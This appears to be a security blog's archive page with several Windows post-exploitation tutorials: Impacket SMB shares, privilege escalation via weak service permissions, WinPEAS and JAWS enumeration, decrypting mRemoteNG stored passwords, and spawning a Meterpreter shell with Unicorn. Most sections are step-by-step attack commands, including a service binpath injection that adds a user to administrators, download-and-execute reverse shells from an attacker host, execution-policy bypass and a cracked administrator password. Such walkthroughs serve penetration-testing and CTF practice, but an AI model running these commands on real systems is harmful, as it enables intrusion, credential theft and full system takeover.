VK9 Security

SMB server with Impaket-smbserver

by | Jun 17, 2021 | WIndows Post-Exploitation

This time we will set a SMB server to run script from using impaket-smbserver

https://github.com/SecureAuthCorp/impacket

Download

1. Download the scripts

  • git clone https://github.com/SecureAuthCorp/impacket.git

2. locate the smbserver script

  • find . -iname *smbserver* 2> /dev/null

Note: I already have it installed in my Kali machine

How to

1. In your Linux machine locate the folder where the script is placed, in this case we will use WinPEAS

  • cd ../Documents/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release

2. Being there now run the smb server

  • impacket-smbserver smbfolder $(pwd) -smb2support -user vk9guest -password vk9pass

3. At the Windows server, using Powershell run

  • $pass = ConvertTo-SecureString 'vk9pass' -AsPlainText -Force
  • $pass
  • $cred = New-Object System.Management.Automation.PSCredential('vk9guest', $pass)
  • $cred

4. Having the credentials already set, we will proceed to connect to the SMB server

  • New-PSDrive -Name vk9smb -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder

5. Now access the share that has been mounted

  • cd vk9smb:
  • dir

6. Execute the program

  • .\winPEASx64.exe

7. If you need to mount multiple times use only a different name

  • New-PSDrive -Name vk9smb -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder
  • New-PSDrive -Name vk9smb2 -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder

 

Windows Weak Service Permissions

by | Jun 8, 2021 | WIndows Post-Exploitation

Sometimes in windows, we discover services that run with SYSTEM level privileges but doesn’t have proper permissions set by an administrator. These services mostly exist in third party software and these services are the best victims for privilege escalation.

In this example we will escalate from user1 to administrator, using OpenVPN service. The administrator of this machine assigned service permissions to user1. This is part of a post exploitation phase.

If you would like to know how to set permissions on services visit this post “Set User permissions on a service”

Exploitation

Manual

1. Download Microsoft accesschk.exe, which is a program that will help us enumerate services (https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk), and extract file

  • Unzip AccessChk.zip

2. Start a web sever in the same directory as the downloaded file in your Linux machine

  • python3.9 -m http.server 9999

3. Having already a low user session, download “accesschk.exe” into the server, using whatever delivery method you know. In this case, I will use powershell IWR for the download. You could also use cmd certutil

  • IWR http://192.168.0.13:9999/accesschk.exe -OutFile accesschk.exe
  • dir

4. Now execute accesschk.exe to list all the services that the user “user1” can modify.)

  • .\accesschk.exe -uwcqv "<current_user>" * -accepteula
  • .\accesschk.exe -uwcqv "user1" * -accepteula

Note: Service_All_Access means that the user has full control over this service and therefore it is possible the properties of this service to be modified.

5. It is telling us we have READ/WRITE permissions on the OpenVPNServiceInteractive service. The next step is to determine the status of this service, the binary path name and if the service with higher privileges.

  • sc.exe qc OpenVPNServiceInteractive

Note: Since the SERVICE_START_NAME is running as LocalSystem this means that the BINARY_PATH_NAME parameter can be modified to execute any command on the system.

6. As we can see our user is not part of the administrators group

  • net localgroup administrators

7. Since, we can inject any command, I will add our user to the administrators group. Since, user1 is not part of this group, then stop and start the application, the restart may fail as the path of the app will be overwritten by the command

  • sc.exe config OpenVPNServiceInteractive binpath= "net localgroup administrators user1 /add"
  • sc.exe stop OpenVPNServiceInteractive
  • sc.exe start OpenVPNServiceInteractive
  • sc.exe qc OpenVPNServiceInteractive

8. Now, verify that the user has been added to the administrators group

  • net localgroup administrators

9. If we actually verify the in services, the command will show instead of the file path

10. We could also run a reverse shell using Powershell. First I will start a webserver in Kali/Parrot hosting Invoke-PowerShellTcp.ps1, which is a Nishang’s script (https://github.com/samratashok/nishang)

  • python3.9 -m http.server 9999

11. Then, start a listener in the same Kali/Parrot

  • nc -lvp 8081

12. Now do the same command to inject the reverse shell

  • sc.exe config OpenVPNServiceInteractive binpath= "cmd /c powershell.exe IEX( IWR http://192.168.0.13:9999/Invoke-PowerShellTcp.ps1 -UseBasicParsing)"
  • sc.exe start OpenVPNServiceInteractive

13. Check on your listener, and, it should now have gotten a connection back as nt authority\system

  • whoami

Solution

Be cautious of the services and permissions you assign to services

Reference

Weak Service Permissions

 

WinPEAS – Windows Enum

by | Jun 6, 2021 | WIndows Post-Exploitation

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. This writing is about how to run it, and, complete Post-Exploitation activities

How to

1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

  • git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
  • cd privilege-escalation-awesome-scripts-suite

2. Navigate through the directories to find the binary files

  • cd winPEAS/winPEASexe/binaries/
  • ls

3. Depending on the type of machine you need to use x64 or x86, This demo will be used on a x64 machine, so, I choose that one

  • cd x64/Release
  • ls

4. There we have our executable script winPEASx64.exe. We now need to find a way to move it to our target machine and execute it

5. We will start a web server at the binary location

  • nc -lvp 9999

6. From the remote server I will use Powershell (IWR), you can also use cmd (certutil)

  • cd C:\Windows\Temp
  • IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
  • dir

7. Now that it is in the server, execute it

  • .\winPEASx64.exe

8. Now you can start inspecting the data

Extra

1. Sometimes it is better to try .bat file if the .exe is failing

  • powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
  • dir

2. Run the app

  • .\winPEAS.bat

Exploiting mRemoteNG

by | May 21, 2021 | WIndows Post-Exploitation

mRemoteNG (mremote) is an open source project (https://github.com/rmcardle/mRemoteNG) that provides a full-featured, multi-tab remote connections manager. It currently supports RDP, SSH, Telnet, VNC, ICA, HTTP/S, rlogin, and raw socket connections. Additionally, It also provides the means to save connection settings such as hostnames, IP addresses, protocol, port, and user credentials, in a password protected and encrypted connections file.

The password can be found at %appdata%/mRemoteNG in a file named confCons.xml. This password can sometimes be the administrator password

How to

1. Access the user %appdata% directory and read confCons.xml

  • cd %appdata%
  • cd mRemoteNG
  • dir
  • type confCons.xml

2. Inspecting the contents of the file confCons.xml, we have to search for the word password. I found a user and a hash

  • Username="Administrator"
  • Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

3. Now, we need to crack this password. We will use a tool mRemoteNG-Decrypt (https://github.com/haseebT/mRemoteNG-Decrypt), so, download it

  • git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
  • cd mRemoteNG-Decrypt
  • ls

4. Run the tool help

  • python3.9 mremoteng_decrypt.py

5. Now use the data we got as arguments for this script, you’ll get the decrypted value

  • python3.9 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

6. Now test this password with the administrator user. We will test SMB as SSH, since, this server got both (SSH in Windows is not common)

SMB

1. Connect to SMB using smbmap, you’ll get Read/Write access to all

  • smbmap -P 445 -H 10.10.10.134 -u administrator -p thXLHM96BeKL0ER2

SSH

1. Log in via SSH using the administrator account

  • ssh administrator@10.10.10.134
  • whoami

Extra psexec

1. We can also try psexec to access to this machine

  • find / -name psexec.py 2> /dev/null
  • python3.9 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.134
  • whoami

Resources

mRemoteNG: Just Loaded with “Features”

 

How to enumerate Windows using JAWS

by | May 21, 2021 | WIndows Post-Exploitation

JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

https://github.com/411Hall/JAWS

How to

1. Download the script

  • git clone https://github.com/411Hall/JAWS.git
  • cd JAWS
  • ls

2. Start a web server

  • python3.9 -m http.server 9999

3. On the Windows computer start powershell

  • powershell
  • IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9:9999/jaws-enum.ps1')

4. Note this time this server is not allowing some checks due to permissions. We can bypass the execution policy by running

  • powershell -ep bypass

5. Now you can try to run the script

  • .\jaws-enum.ps1

6. You can also save the output to a file

  • .\jaws-enum.ps1 -OutputFilename result.txt

7. It can be run directly from CMD

  • powershell.exe -ExecutionPolicy bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

8. Then just read the file

  • type JAWS-Enum.txt
  • type result.txt

How to use unicorn to spawn a shell

by | Apr 7, 2021 | WIndows Post-Exploitation

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.

https://github.com/trustedsec/unicorn

How to use (Metasploit)

1. Download the tool

  • git clone https://github.com/trustedsec/unicorn.git
  • cd unicorn
  • ls

2. Run the application to see some examples

  • ./unicorn.py

3. Display help menu

  • ./unicorn.py --h

4. Generate a payload (unicorn.py payload LHOST LPORT)

  • ./unicorn.py windows/meterpreter/reverse_tcp 192.168.0.13 4444

Note: 2 files were created powershell_attack.txt & unicorn.rc

5. Now load unicorn.rc into Metasploit, which is the msf configuration to load. It will automatically start a listener

  • msfconsole -r unicorn.rc

6. Now that the listener has started, we need to also start a python web listener to transfer the payload to the remote machine

  • python3.9 -m http.server 9999

7. At the remote server run

  • powershell "iex(new-object net.webclient).downloadString('http://192.168.0.13:9999/powershell_attack.txt')"

8. The web server should now show a log connection

9. Metasploit should now have a reverse connection

  • sessions -i